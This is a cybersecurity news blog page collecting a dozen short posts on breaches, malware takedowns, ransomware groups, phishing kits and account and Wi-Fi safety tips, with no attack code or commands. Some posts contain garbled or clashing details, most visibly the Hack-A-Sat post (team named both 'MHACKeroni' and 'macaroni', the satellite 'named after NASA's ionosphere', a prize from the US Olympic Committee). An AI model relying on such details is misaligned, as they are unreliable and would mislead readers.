Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Hacking. Show all posts
Hacking
Cyber Crime cybercriminals data security Ethical Hacking Hackers Hacking

Unveiling the New Era of Hacking Ethics: Profit Over Principles

 

Hacking, once a realm of curiosity-driven exploration, has morphed into a complex ecosystem of profit-driven cybercrime. Originating in the 1960s, hacking was fueled by the insatiable curiosity of a brilliant community known as "hackers." These early pioneers sought to push the boundaries of computing and digital technology, driven by a passion for discovery rather than malicious intent. 

However, the perception of hacking has since undergone a dramatic transformation. Today, the term "hacking" often conjures images of lone individuals in hoodies, exploiting vulnerabilities to steal data or wreak havoc from the safety of dimly lit rooms. While this stereotype may be exaggerated, it reflects a disturbing reality: the rise of cybercriminals who exploit technology for personal gain. 

In recent years, there has been a notable shift in the attitudes and behaviours of hackers, particularly within criminal cyber rings. Once governed by unwritten codes of ethics, these groups are now redefining the rules of engagement, prioritizing profit above all else. What was once considered off-limits—such as targeting hospitals or critical infrastructure—is now fair game for profit-driven hackers, posing significant risks to public safety and national security. 

One of the most alarming trends is the rise of ransomware attacks, where hackers encrypt sensitive data and demand payment for its release. These attacks have become increasingly brazen and aggressive, targeting organizations of all sizes and industries. The Colonial Pipeline attack, while technically not disrupting deliveries, sent shockwaves through the cybersecurity community, highlighting the audacity and impunity of modern cybercriminals. 

Moreover, hackers are no longer content with targeting individuals or businesses just once. Exploiting vulnerabilities multiple times has become commonplace, reflecting a growing sophistication and ruthlessness among cyber criminals. Several factors have contributed to this evolution of hacking ethics. Global tensions, technological advancements, and the proliferation of online platforms have all played a role in shaping the behaviour of modern hackers. 

The accessibility of hacking tools and information has lowered the barrier to entry, attracting individuals of all ages and skill levels to the world of cybercrime. Despite efforts by law enforcement and cybersecurity professionals, the threat of cybercrime continues to loom large. 

Businesses and individuals must remain vigilant, investing in robust cybersecurity measures and staying informed about evolving threats. By understanding the changing landscape of hacking ethics, we can better defend against cyber attacks and protect our digital assets and identities in an increasingly connected world.
Read more »
Hacking
2-Step Verification Account security Action Fraud Cyber Crime Facebook Gmail Hacking

Gmail and Facebook Users Advised to Secure Their Accounts Immediately

 



In a recent report by Action Fraud, it has been disclosed that millions of Gmail and Facebook users are at risk of cyberattacks, with Brits losing a staggering £1.3 million to hackers. The data reveals that a concerning 22,530 individuals fell victim to account breaches in the past year alone.

According to Pauline Smith, Head of Action Fraud, the ubiquity of social media and email accounts makes everyone susceptible to fraudulent activities and cyberattacks. As technology advances, detecting fraud becomes increasingly challenging, emphasising the critical need for enhanced security measures.

The report highlights three primary methods exploited by hackers to compromise accounts: on-platform chain hacking, leaked passwords, and phishing. On-platform chain hacking involves cybercriminals seizing control of one account to infiltrate others. Additionally, leaked passwords from data breaches pose a significant threat to account security.

To safeguard against such threats, Action Fraud recommends adopting robust security practices. Firstly, users are advised to create strong and unique passwords for each of their email and social media accounts. One effective method suggested is combining three random words that hold personal significance, balancing memorability with security.

Moreover, implementing 2-Step Verification (2SV) adds an extra layer of protection to accounts. With 2SV, users are prompted to provide additional verification, such as a code sent to their phone, when logging in from a new device or making significant changes to account settings. This additional step fortifies account security, mitigating the risk of unauthorised access even if passwords are compromised.

Recognizing the signs of phishing scams is also crucial in preventing account breaches. Users should remain vigilant for indicators such as spelling errors, urgent requests for information, and suspicious inquiries. By staying informed and cautious, individuals can reduce their vulnerability to cyber threats.

In response to the escalating concerns, tech giants like Google have implemented measures to enhance password security. Features such as password security alerts notify users of compromised, weak, or reused passwords, empowering them to take proactive steps to safeguard their accounts.

The prevalence of online account breaches demands users to stay on their tiptoes when it comes to online security. By adopting best practices such as creating strong passwords, enabling 2-Step Verification, and recognizing phishing attempts, users can safeguard their personal information and financial assets from malicious actors.



Read more »
Supply Chain
Community breach Cyber Crime Emails Hacking Microsoft Midnight Blizzard Supply Chain

Russian Hackers Breach Microsoft's Security: What You Need to Know

 


In a recent set of events, reports have surfaced of a significant cyberattack on Microsoft, allegedly orchestrated by Russian hackers. This breach, attributed to a group known as Midnight Blizzard or Nobelium, has raised serious concerns among cybersecurity experts and the public alike.

The attack targeted Microsoft's source code repositories, exposing sensitive company information and communications with partners across various sectors, including government, defence, and business. While Microsoft assures that no customer-facing systems were compromised, the breach has far-reaching implications for national and international security.

Cybersecurity experts warn of the potential for increased zero-day vulnerabilities, which are undiscovered security flaws that can be exploited by hackers. Access to source code provides attackers with a "master key" to infiltrate systems, posing a significant threat to organisations and users worldwide.

The severity of the breach has prompted strong reactions from industry professionals. Ariel Parnes, COO of Mitiga, describes the incident as "severe," emphasising the critical importance of source code security in the digital age. Shawn Waldman, CEO of Secure Cyber Defense, condemns the attack as a "worst-case scenario," highlighting the broader implications for national security.

The compromised data includes emails of senior leadership, confidential communications with partners, and cryptographic secrets such as passwords and authentication keys. Larry Whiteside Jr., a cybersecurity expert, warns of potential compliance complications for Microsoft users and partners, as regulators scrutinise the breach's impact on data protection laws.

As the fallout from the breach unfolds, there are growing concerns about the emergence of zero-day vulnerabilities and the need for proactive defence measures. Experts stress the importance of threat hunting and incident response planning to mitigate the risks posed by sophisticated cyber threats.

The incident underscores the ongoing battle in the global cyber warfare landscape, where even tech giants like Microsoft are not immune to attacks. With cybercriminals increasingly targeting supply chains, the need for enhanced security measures has never been more urgent.

The breach of Microsoft's systems serves as a wake-up call for individuals and organisations alike. It highlights the ever-present threat of cyberattacks in an increasingly interconnected world and underscores the need for enhanced cybersecurity measures. By staying vigilant and proactive, establishments can mitigate the risks posed by cyber threats and protect their digital assets from exploitation.

As the field of cybersecurity keeps changing and developing, stakeholders must work together to address the underlying threats and ensure the protection of critical infrastructure and data. This recent breach of Microsoft's security by Russian hackers has raised serious concerns about the vulnerability of digital systems and the need for robust cybersecurity measures.


Read more »
Hacking
CMS editor Cyber Security Threats Data Theft FCKeditor Hacking

Old Website Tool Exploited by Hackers, Puts Education and Government Sites at Risk

Hackers are taking advantage of an old CMS editing tool for websites that have not been updated in a long time. They are using it to break into educational and government websites all over the world. Their goal is to mess with search results by sending people to dangerous websites or scams. Open redirect is like leaving the front door of your website wide open for hackers. 

They can sneak in, pretend to be you, and lead unsuspecting visitors straight into their trap. Imagine someone sending a fake email pretending to be from your company. The email has a link that looks legit because it has your domain name. But when people click on it, instead of going to your website, they end up on the hacker's site. 

This sneaky trick works because the website changes the link without you realizing it. Sometimes, it is done by the website itself using fancy code. Other times, it is as simple as sending a secret message to the visitor's browser. Either way, it is bad news for your online reputation. 

Imagine a scenario where there's a link on a website like this: "https://www.example.com/?redirect=". This link is supposed to take visitors to a specific webpage. But here is the catch: anyone can change that link to lead to whatever website they want. It is like having a signpost that can be tampered with to send people wherever someone pleases. That is what we call an open redirect. 

Attackers exploit open redirects to perpetrate phishing schemes, distribute malware, or perpetrate scams under the guise of legitimate domains. Because these URLs originate from reputable sources, they often evade security measures implemented by various products. When search engines index these redirects, they unintentionally make harmful links appear higher in search results.  

This means that open redirects can be used to manipulate search engine rankings by using trusted websites to promote shady content for specific searches. Attackers exploit open redirects on trusted domains to conduct phishing, distribute malware, or scam users. These redirects bypass security filters and can rank malicious content higher in search results. Despite their risks, major companies may not prioritize fixing them unless they lead to more severe vulnerabilities. 

@g0njxa, a cybersecurity researcher, uncovered a troubling malicious redirect campaign targeting university websites. This campaign exploits open redirect flaws associated with FCKeditor, a now outdated web text editor. Despite FCKeditor being replaced by the more modern CKEditor in 2009, many institutions still use the vulnerable version. 

@g0njxa identified several prominent institutions impacted by the malicious redirect campaign, including MIT, Columbia University, and government websites in Virginia and Spain. Despite these warnings, the software developer's response underscores the urgency of transitioning away from FCKeditor, which has been obsolete since 2010. This highlights the critical need for adopting more secure alternatives.
Read more »
Warzone RAT
Cyber Crime Cyber Threats FBI Hacking malware Warzone RAT

FBI Shuts Down Warzone RAT; Cybercriminals Arrested

 


In a major victory against cybercrime, the FBI has successfully taken down the Warzone RAT malware operation. This operation led to the arrest of two individuals involved in the illicit activities. One of the suspects, 27-year-old Daniel Meli from Malta, was apprehended for his role in the distribution of Warzone RAT, a notorious remote access trojan used for various cybercrimes.

Warzone RAT, also known as 'AveMaria,' surfaced in 2018 as a commodity malware offering a range of malicious features. These include bypassing User Account Control (UAC), stealing passwords and cookies, keylogging, remote desktop access, webcam recording, and more. Meli's arrest took place last week in Malta following an indictment issued by U.S. law enforcement authorities on December 12, 2023.

The charges against Meli include unauthorised damage to protected computers, illegally selling and advertising an electronic interception device, and participating in a conspiracy to commit several computer intrusion offences. He has been involved in the cybercrime space since at least 2012, starting at the age of 15 by selling hacking ebooks and the Pegasus RAT for a criminal group called 'Skynet-Corporation.'

Simultaneously, another key figure linked to Warzone RAT, Prince Onyeoziri Odinakachi, 31, from Nigeria, was arrested for providing customer support to cybercriminals purchasing access to the malware. Federal authorities in Boston seized four domains, including the primary website "warzone.ws," associated with Warzone RAT.

The international law enforcement effort coordinated by the FBI not only resulted in arrests but also identified and confiscated server infrastructure related to the malware across various countries, including Canada, Croatia, Finland, Germany, the Netherlands, and Romania.

While the U.S. Department of Justice (DoJ) mainly implicates Meli in the distribution and customer support for the malware, it remains unclear whether he is the original creator of Warzone RAT. The DoJ announcement reveals Meli's involvement as a seller in the cybercrime space since the age of 15, raising questions about the malware's origin.

Meli faces serious consequences, with a potential 15-year prison sentence, three years of supervised release, and fines of up to $500,000 or twice the gross gain or loss (whichever is greater) for the charges against him. The Northern District of Georgia seeks Meli's extradition from Malta to the United States for trial.

This successful operation not only brings two significant cybercriminals to justice but also marks a crucial step in dismantling the infrastructure supporting Warzone RAT. The FBI's coordinated efforts with international law enforcement agencies highlight the commitment to combating cyber threats on a global scale. The implications of this takedown will likely have a positive impact on cybersecurity efforts worldwide, deterring future vicious activities.


Read more »
Supply Chain Attack
Artifcial Intelligence Cyber Hackers Data Breach Hacking Supply Chain Supply Chain Assaults Supply Chain Attack

Hugging Face's AI Supply Chain Escapes Near Breach by Hackers

 

A recent report from VentureBeat reveals that HuggingFace, a prominent AI leader specializing in pre-trained models and datasets, narrowly escaped a potential devastating cyberattack on its supply chain. The incident underscores existing vulnerabilities in the rapidly expanding field of generative AI.

Lasso Security researchers conducted a security audit on GitHub and HuggingFace repositories, uncovering more than 1,600 compromised API tokens. These tokens, if exploited, could have granted threat actors the ability to launch an attack with full access, allowing them to manipulate widely-used AI models utilized by millions of downstream applications.

The seriousness of the situation was emphasized by the Lasso research team, stating, "With control over an organization boasting millions of downloads, we now possess the capability to manipulate existing models, potentially turning them into malicious entities."

HuggingFace, known for its open-source Transformers library hosting over 500,000 models, has become a high-value target due to its widespread use in natural language processing, computer vision, and other AI tasks. The potential impact of compromising HuggingFace's data and models could extend across various industries implementing AI.

The focus of Lasso's audit centered on API tokens, acting as keys for accessing proprietary models and sensitive data. The researchers identified numerous exposed tokens, some providing write access or full admin privileges over private assets. With control over these tokens, attackers could have compromised or stolen AI models and supporting data.

This discovery aligns with three emerging risk areas outlined in OWASP's new Top 10 list for AI security: supply chain attacks, data poisoning, and model theft. As AI continues to integrate into business and government functions, ensuring security throughout the entire supply chain—from data to models to applications—becomes crucial.

Lasso Security recommends that companies like HuggingFace implement automatic scans for exposed API tokens, enforce access controls, and discourage the use of hardcoded tokens in public repositories. Treating individual tokens as identities and securing them through multifactor authentication and zero-trust principles is also advised.

The incident highlights the necessity for continual monitoring to validate security measures for all users of generative AI. Simply being vigilant may not be sufficient to thwart determined efforts by attackers. Robust authentication and implementing least privilege controls, even at the API token level, are essential precautions for maintaining security in the evolving landscape of AI technology.
Read more »
U.S. targets
Agent Raccoon Backdoor Hacking malware Online Security Threat actor U.S. targets

Hackers Use This New Malware to Backdoor Targets in Middle East, Africa and U.S

 

Various entities in the Middle East, Africa, and the United States have fallen victim to an unidentified threat actor orchestrating a campaign involving the dissemination of a recently discovered backdoor named Agent Racoon. According to Chema Garcia, a researcher at Palo Alto Networks Unit 42, the malware is crafted using the .NET framework and exploits the domain name service (DNS) protocol to establish a covert communication channel, facilitating diverse backdoor functionalities.

The targeted organizations hail from a range of sectors, including education, real estate, retail, non-profit, telecommunications, and government. Despite the lack of attribution to a specific threat actor, the campaign is suspected to be state-sponsored due to discernible victimology patterns and the utilization of sophisticated detection and defense evasion techniques. Palo Alto Networks is monitoring this threat cluster under the label CL-STA-0002. The exact method of infiltration and the timeline of the attacks remain unclear at this point.

The adversary employs additional tools alongside Agent Racoon, such as a customized version of Mimikatz named Mimilite and a novel utility known as Ntospy. The latter utilizes a custom DLL module implementing a network provider to pilfer credentials for a remote server. Notably, while Ntospy is employed across the affected organizations, Mimilite and Agent Racoon are specifically found in the environments of non-profit and government-related organizations.

Agent Racoon, executed through scheduled tasks, enables the execution of commands, uploading and downloading of files, all while camouflaging itself as Google Update and Microsoft OneDrive Updater binaries. The command-and-control (C2) infrastructure linked to the implant dates back to at least August 2020, with the earliest sample of Agent Racoon uploaded to VirusTotal in July 2022.

Unit 42's investigation revealed instances of successful data exfiltration from Microsoft Exchange Server environments, resulting in the theft of emails matching various search criteria. The threat actor has also been observed harvesting victims' Roaming Profile. Despite these findings, the tool set associated with this campaign has not been definitively linked to a specific threat actor and appears to extend beyond a single cluster or campaign, according to Garcia.
Read more »
world’s largest organizations
Cyber Crime cybercrime gang Cybersecurity global threats Hacking LockBit world’s largest organizations

Unveiling LockBit: Cybercrime Gang Targeting Global Titans in Hacking Spree

 

Ransomware, a form of malicious software, has a history spanning over three decades. However, it only gained regular attention in popular media over the last ten years.

This type of malware locks access to computer systems or encrypts files until a ransom is paid. Cybercriminal groups now view ransomware as a lucrative scheme, especially with the emergence of "ransomware as a service," which enables various groups to profit from successful ransom demands through affiliate schemes.

One prominent group, LockBit, has garnered attention by showcasing high-profile victims on its website. LockBit refers to both the malware and the group behind it, complicating its identification.

LockBit emerged in 2019 as a stealthy malware aimed at infiltrating organizations, locating valuable data, and encrypting it. Unlike mere data theft, LockBit encrypts data and holds it hostage until a ransom is paid, often resorting to threats of data publication (known as double extortion) if the payment deadline isn't met.

The LockBit group remains largely enigmatic, claiming no specific political allegiance and welcoming an unlimited number of affiliates worldwide solely interested in financial gain. However, they enforce rules prohibiting attacks on certain targets, including critical infrastructure like hospitals and specific post-Soviet countries.

Despite these rules, instances like a Canadian hospital falling victim to LockBit indicate the potential breach of these restrictions by rogue users. Interestingly, LockBit justifies avoiding specific countries due to the high number of members originating from the former Soviet Union, despite the group's current location in the Netherlands.

LockBit's victims range from the United Kingdom's Royal Mail and Ministry of Defence to Japanese company Shimano and aerospace giant Boeing, whose leaked data surfaced after refusing to pay the ransom. LockBit has also allegedly claimed responsibility for the recent ransomware incident involving the Industrial and Commercial Bank of China, linking the group to nearly 2,000 victims in the United States alone.

Ransomware as a service (RaaS) has surged in popularity, mirroring legitimate software services like Microsoft 365, providing cybercriminals with tools to conduct ransomware campaigns efficiently and profitably. These services handle every aspect of the criminal process, enticing new affiliates with a 20% commission and requiring a hefty deposit in Bitcoin.

Preventing ransomware attacks involves robust cybersecurity measures such as system updates, password management, network monitoring, and prompt responses to suspicious activities. The decision to pay a ransom remains subjective for organizations, but bolstering cybersecurity measures can deter criminal groups from targeting easier victims.
Read more »
Russian Hackers
cryptocurrency Cyber Crime Elliptic Elliptic reports FTX Hacking Russian Hackers

Elliptic Claims: FTX Hacks Could Have Possible Connection to Russia


In November 2022, the disorderly collapse of the cryptocurrency exchange FTX resulted in a staggering $477 million hack. The previously inactive stolen funds became active just days before Sam Bankman-Fried, the founder and CEO of FTX, went on trial. Elliptic analysts have investigated the event in-depth, following the intricate blockchain trail left by the hackers and finding evidence of Russia's involvement. 

Elliptic’s Insight for the Hack 

According to a report by Elliptic – one of the largest providers of blockchain analytics and crypto compliance solutions – the hackers cleverly masked their activity by moving the stolen assets through a series of intricate transactions. They used private wallets and decentralized exchanges to make it more difficult to trace them. Elliptic was able to track the money, though, and discovered that the hackers distributed a sizable percentage of it to several locations after converting a considerable amount into ether. Potential connections to Russian actors are also revealed by Elliptic's on-chain analysis.

A Possible FTX Hack-Russia Connection 

According to Elliptic, Russia is potentially behind the FTC hack. Apparently, the hacker’s procedures and the subsequent travel of the stolen funds resemble tactics frequently linked to Russian cybercriminals.

The research firm claimed that the laundering tactics used post-theft are strikingly similar to those typically used by Russian hackers. The method they moved money, the private wallets they preferred, and their affinity for decentralized exchanges are all reminiscent of strategies Russian hackers have employed in the past.

The speed and efficiency with which the stolen fund’s laundering is carried out suggested that the campaign was well-planned by an experienced group of hackers. The suspects so far have included everyone from rogue FTX personnel carrying out an inside job to the North Korean hacking collective Lazarus, which has been linked to a number of crypto protocol flaws. While the suspects could be several in number, Russian threat actors check most of the boxes for the ones behind the hack.

Elliptic stated "A Russia-linked actor seems a stronger possibility. Of the stolen assets that can be traced through ChipMixer, significant amounts are combined with funds from Russia-linked criminal groups, including ransomware gangs and darknet markets, before being sent to exchanges.”

Elliptic’s analysis not only emphasize the significance of advanced blockchain analytics in confronting such challenges but also highlights the geopolitical implications present in cybercrime cases. With the swift developments in the digital currency realm, acquiring an insight into the origins and motivations behind these attacks has become important for both security measures and international diplomatic relations.  

Read more »
Spyware
Cyber Attacks EU European Union Hacking Human rights Meduza Pegasus Pegasus Spyware Russian exiled journalist Spyware

Russian Exiled Journalist Says EU Should Ban Spyware


The editor-in-chief of the independent Russian news site Meduza has urged the European Union to enact a comprehensive ban on spyware, given that spyware has been frequently used to violate human rights.

According to Ivan Kolpakov, Meduza’s editor-in-chief based in Latvia, it was obvious that Europeans should be very concerned about Pegasus in light of the discoveries regarding the hacking of his colleague Galina Timichenko by an as-yet-unconfirmed EU country.

“If they can use it against an exiled journalist there are no guarantees they cannot use it against local journalists as well[…]Unfortunately, there are a lot of fans in Europe, and we are not only talking about Poland and Hungary, but Western European countries as well,” said Kolpakov.

Since last month, the European Commission has been working on guidelines for how governments could employ surveillance technologies like spyware in compliance with EU data privacy and national security rules since last month. Despite the fact that member states are responsible for their own national security, the Commission is considering adopting a position after learning that 14 EU governments had purchased the Pegasus technology from NSO Group.

Apparently, Timichenko was targeted by Pegasus in February 2023 when she was in Berlin for a private gathering of Russian media workers exile. The meeting's subject was the threats posed by the Russian government's categorization of independent Russian media outlets as foreign agents.

Taking into account the work that Timichenko deals with, Russia was first suspected; but, according to the digital rights organization Access Now, additional information suggests that one of the intelligence services of an EU member state — the exact one is yet unknown — is more likely to be to blame.

Allegedly, the motive behind the hack could be that numerous Baltic nations, to whom Russia has consistently posed a threat, are worried that a few FSB or GRU agents may have infiltrated their borders among expatriate dissidents and journalists.

“It may happen and probably it actually happens, but in my opinion, it does not justify the usage of that kind of brutal tool as Pegasus against a prominent independent journalist,” Kolpakov said.

Kolpakov believes that the revelations have left the exiled community feeling they are not safe in Europe. “This spyware has to be banned here in Europe. It really violates human rights,” he added.     

Read more »
W3LL
Account Attack BEC Business Compromise Cyber Security Cyberattack CyberCrime Email hack Hacking MFA Microsoft Panel phishing Report Security threat W3LL

W3LL Store: Unmasking a Covert Phishing Operation Targeting 8,000+ Microsoft 365 Accounts

 

A hitherto undisclosed "phishing empire" has been identified in a series of cyber attacks targeting Microsoft 365 business email accounts spanning six years. 

According to a report from cybersecurity firm Group-IB, the threat actor established an underground market called W3LL Store, catering to a closed community of around 500 threat actors. This market offered a custom phishing kit called W3LL Panel, specifically designed to bypass Multi-Factor Authentication (MFA), alongside 16 other specialized tools for Business Email Compromise (BEC) attacks.

Between October 2022 and July 2023, the phishing infrastructure is estimated to have aimed at over 56,000 corporate Microsoft 365 accounts,  compromising at least 8,000 of them. The majority of the attacks were concentrated in countries including the U.S., the U.K., Australia, Germany, Canada, France, the Netherlands, Switzerland, and Italy. The operators of this operation reportedly reaped approximately $500,000 in illegal gains.

Various sectors fell victim to this phishing campaign, notably manufacturing, IT, consulting, financial services, healthcare, and legal services. Group-IB pinpointed almost 850 distinct phishing websites associated with the W3LL Panel during the same timeframe.

The Singapore-based cybersecurity company has characterized W3LL as a comprehensive phishing tool that offers an array of services, encompassing customized phishing tools, mailing lists, and access to compromised servers. This underscores the growing prevalence of phishing-as-a-service (PhaaS) platforms.

The threat actor responsible for this kit has been active since 2017, initially focusing on creating tailored software for bulk email spam (referred to as PunnySender and W3LL Sender) before shifting their attention towards developing phishing tools for infiltrating corporate email accounts.

A key element of W3LL's arsenal is an adversary-in-the-middle (AiTM) phishing kit, capable of evading multi-factor authentication (MFA) protections. It is available for purchase at $500 for a three-month subscription, followed by a monthly fee of $150. The panel not only harvests credentials but also includes anti-bot features to bypass automated web content scanners, prolonging the lifespan of their phishing and malware campaigns.

The W3LL Store extends a 70/30 split on commissions earned through its reseller program to PhaaS affiliates, along with a 10% "referral bonus" for bringing in other trusted parties. To prevent unauthorized distribution or resale, each copy of the panel requires a license-based activation.

BEC attacks employing the W3LL phishing kit involve a preparatory phase to verify email addresses using an auxiliary utility known as LOMPAT, followed by the delivery of phishing messages. Victims who interact with the deceptive link or attachment are directed through an anti-bot script to filter out unauthorized visitors, subsequently landing on the phishing page via a redirect chain employing AiTM tactics to extract credentials and session cookies.

With this access, the threat actor proceeds to log into the target's Microsoft 365 account without triggering MFA, utilizing a custom tool called CONTOOL for automated account discovery. This enables the extraction of emails, phone numbers, and other sensitive information.

Noteworthy tactics employed by the malware author include using Hastebin, a file-sharing service, to store stolen session cookies, and utilizing platforms like Telegram and email for exfiltrating the credentials to criminal actors.

This disclosure comes shortly after Microsoft's warning regarding the proliferation of AiTM techniques through PhaaS platforms, such as EvilGinx, Modlishka, Muraena, EvilProxy, and Greatness, which facilitate unauthorized access to privileged systems at scale without the need for re-authentication.

"What really makes W3LL Store and its products stand out from other underground markets is the fact that W3LL created not just a marketplace but a complex phishing ecosystem with a fully compatible custom toolset that covers almost entire killchain of BEC and can be used by cybercriminals of all technical skill levels," Group-IB's Anton Ushakov said.

"The growing demand for phishing tools has created a thriving underground market, attracting an increasing number of vendors. This competition drives continuous innovation among phishing developers, who seek to enhance the efficiency of their malicious tools through new features and approaches to their criminal operations."


Read more »
Wi-fi
Cyber Security Data Privacy Hacking Internet Safety Network Prevention Protection Security Wi-fi

Secure Your Wi-Fi: Spot Hacking Signs and Preventive Tips

 

The discussion around being cautious regarding security while utilizing public Wi-Fi networks is well-known due to the susceptibility of these networks to compromise by criminals. Yet, it's essential to recognize that private Wi-Fi networks are also vulnerable to hacking.

Cybercriminals possess the ability to breach private Wi-Fi networks and gain access to personal data. Gaining insight into their techniques is crucial for enhancing network security.

Methods Employed by Cybercriminals to Compromise Wi-Fi Networks

The inherent wireless nature of Wi-Fi networks allows numerous devices to connect concurrently. However, vulnerabilities exist that attackers exploit to illicitly access browsing sessions. Several tactics are employed to achieve this...

1. Obtaining Router's Default Password
Relying on the default password of your Wi-Fi router poses risks, as intruders can deduce it from the device's settings. It is advisable to change the password immediately upon setting up your connection. Once this step is taken, the default passcode becomes invalid.

2. Utilizing Brute-Force Attacks
Merely altering the default password doesn't guarantee immunity against hacking. Malevolent actors can utilize brute-force techniques, attempting multiple combinations of usernames and passwords until a match is found. This process is automated to expedite testing numerous login credentials.

3. Executing DNS Hijacking
Hackers might execute a DNS hijack, redirecting traffic from your device to their malicious websites. This manipulation involves altering the queries generated by your Wi-Fi's DNS. Consequently, you unknowingly connect to their sites, enabling them to extract your data.

Detecting Signs of Wi-Fi Breach

Cybercriminals endeavor to execute non-intrusive infiltration of your Wi-Fi network. However, by remaining vigilant, you can discern potential indications of compromise:

1. Unfamiliar IP Addresses Connected
Each internet-connected device possesses a distinctive IP address. Your Wi-Fi maintains a roster of connected IP addresses. Although these devices might not be readily visible, they are stored in a designated area. Reviewing the IP address section in your device settings can reveal unfamiliar devices.

2. Browser Redirection
Hacked Wi-Fi networks often prompt web browsers to perform unintended functions. For instance, inputting a specific URL may result in redirection to unfamiliar websites. Such alterations indicate a DNS setting change, redirecting browsers to malicious sites for data extraction.

3. Modified Wi-Fi Password
Observing sudden password inaccuracies indicates potential intrusion. If you haven't modified the password, a hacker likely has. Changing the password is among the first steps taken by scammers post-breach, denying your immediate access and facilitating their control.

4. Sluggish Internet Connection
While occasional internet slowdowns are common, persistent sluggishness can denote unauthorized network access. Intruders could engage in bandwidth-intensive activities, causing noticeable network degradation.

Preventive Measures Against Wi-Fi Hacking

Despite Wi-Fi's associated security risks, several proactive steps can thwart potential attacks:

1. Enable Encryption Mode
Utilizing encryption safeguards against eavesdropping attacks that intercept communications. Encryption obfuscates data, rendering it indecipherable to external parties even if acquired. Contemporary Wi-Fi routers typically include default encryption options like WPA and WPA2, enhancing security.

2. Regular Password Changes
The security of your Wi-Fi network hinges on your password's strength. While robust passwords are advised, their invulnerability is uncertain. To preempt this, periodically alter your router's password. This continual modification deters intruders. Employing a password manager can alleviate the inconvenience while boosting security.

3. VPN Usage in Public Spaces
Public Wi-Fi networks are susceptible to intrusions. Utilizing a virtual private network (VPN) conceals your IP address, rendering you inconspicuous while browsing. This measure safeguards against criminal attempts to compromise your connectivity.

4. Deactivate Remote Administration
Remote access to Wi-Fi networks, though convenient, is exploited by attackers. Disabling remote administration, unless necessary, closes an exploitable gap.

5. Turn Off Wi-Fi When Inactive
Inactive Wi-Fi is impervious to hacking. Switching off your router during periods of inactivity eliminates immediate threats and prevents unauthorized usage by neighbors.

6. Fortify Wi-Fi Security Settings
Private Wi-Fi networks offer substantial user and security controls. Activation of multiple security features is advisable. Layers of security present formidable challenges for criminals attempting unauthorized entry.

In conclusion, while discussions often center on the vulnerability of public Wi-Fi networks, it's vital to recognize that private networks are not immune to hacking. Understanding the tactics employed by cybercriminals, recognizing breach indicators, and implementing comprehensive security measures are pivotal in safeguarding your Wi-Fi network and personal data.
Read more »
Satellite Security
Air Force Cyber Security Cyberattacks CyberCrime Cyberhackers Hack-A-Sat Hacking NASA Satellite Security

Satellite Security Breached: Hackers Pocket $50K for Exploiting US Air Force Defenses

 


An impressive security exercise was conducted during the annual "Hack-A-Sat" competition within the US Air Force during which hackers managed to successfully compromise a satellite in orbit. MHACKeroni, an Italian team that emerged as the winner of the competition, won a prize of $50,000 for the discovery of vulnerabilities within the satellite's network systems which allowed them to reveal the vulnerabilities. 

To identify gaps in the US cyber defense against potential threats from countries like Russia and China, a hacking competition is being held at the DEF CON hacker conference in Las Vegas this week. 

Moonlighter, a small cubesat named after NASA's ionosphere, was developed by NASA's Aerospace Corporation at the request of NASA's Defense Research Laboratory. The small satellite was launched into space along with a cargo payload for the International Space Station on June 5, 2023, atop a SpaceX Falcon 9 rocket.  

An air force satellite, the US Air Force Moonlighter, was the target of a hacker challenge this year in the form of attacks on a real satellite in space. In the program, five teams were selected out of over 700 applications to establish a data link between the satellite and the ground station, while keeping other teams at bay by establishing a strategic hack into the satellite.

A live satellite zooming above Earth was to be hacked as the competition took place for the first time this year. In previous years, simulated satellites were used on the ground to simulate the live satellites they would hack.  

The satellite during the competition only had a few windows open to download files, telemetry, and scripts dependent on where it was located in orbit, so it had a limited number of opportunities to upload or download files. Normally, even the runners of the CTF occasionally cannot establish a connection during the designated contact window because the CTF operates under real-world circumstances. 

In addition, the U.S. Air Force and the U.S. Naval Space Systems Command of the U.S. Navy conduct competitions known as Hack-A-Sat to find vulnerabilities in the satellite systems overhead that can be exploited to enhance satellite system security. 

In this year's challenge, five teams participated, with "macaroni" taking the top honors and taking home the prize this year, representing five Italian cyber research firms. It was announced that $50,000 would be given as the prize for the first-place winner.   

Taking second place was Poland Can Into Space, an organization that carries out cyber-based research. Moreover, the British-American team "JUMP FS :[rcx]" took third place and received a check for $20,000 from the United States Olympic Committee. 

Capt. Kevin Bernert, a member of the U.S. The Space Force revealed at the announcement of the Hack-A-Sat that the organizers were still collecting data from the Moonlighter. Thus, the team assembled in an emergency stairway before moving to the hotel room where they could connect to the Moonlighter and gather data to make sure the final results were accurate.

Although there was a playful atmosphere to the competition, it was an important reminder that satellite hacking poses a serious threat, one that is growing. The consequences of such breaches in geopolitical dynamics can be significant. 

Just hours before the Russian military deployed troops into Ukraine in 2022, the Russian government targeted Viasat, resulting in a major loss of communication during the invasion. Viasat is an American satellite company based in California. In addition to this, classified documents indicate that as part of its warfighting strategy, China is working on acquiring control of enemy satellites as part of its development of technology. 

The leak of classified documents has also revealed that China has been developing technology that is intended to control and manipulate satellites of foreign adversaries and pick up signals from them. It is evident from the successful breach of a satellite belonging to the US Air Force that it is important to identify vulnerabilities and enhance security measures in space in the future. To prevent potential geopolitical issues in the future, it is imperative to address the security of satellite systems to mitigate the risks involved. 

With this annual contest, satellite systems hold several vulnerabilities. It's a means of uncovering these vulnerabilities and enhancing cybersecurity measures to ensure potential threats cannot be exploited. To enhance the security of satellite networks and mitigate the risks associated with hostile cyber attacks, we must identify and address these weaknesses in the US Air Force and other space agencies.
Read more »
Vulnerability
Cyber Attacks Cyberfrauds Cybersecurity Hacking Linux Encryptor Ransomwares VMware Vulnerability

ESXi Servers are Targeted by Linux-Based Akira Ransomware

 


As part of a ransomware operation called Akira, VMware ESXi virtual machines have been encrypted using a Linux encryption tool. This is to block access to the virtual machines. The attack comes after the company targeted Windows systems for a couple of months. 

To encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide, the Akira ransomware operations use a Linux encryptor to encrypt VMware ESXi virtual machines controlled by VMware. 

There has been a recent expansion of the Akira ransomware and it now targets VMware ESXi virtual machines using a Linux encryptor. It is because of this adaptation that Akira can now attack companies across the globe. 

This ransomware virus, Akira, was found in March 2023. As the most recent addition to the ransomware landscape, it is relatively less well-known. 

In the short time that Akira ransomware has been in operation, it has been confirmed that 45 organizations have been affected. Most of the targets are based in the U.S. Organizations affected range from childcare centers to large financial institutions but all have been affected. 

The threat actors are engaged in double extortion attacks against their victims, demanding several million dollars and stealing data from breached networks, encrypting files, and encrypting the data until they reach the point of demanding payouts.

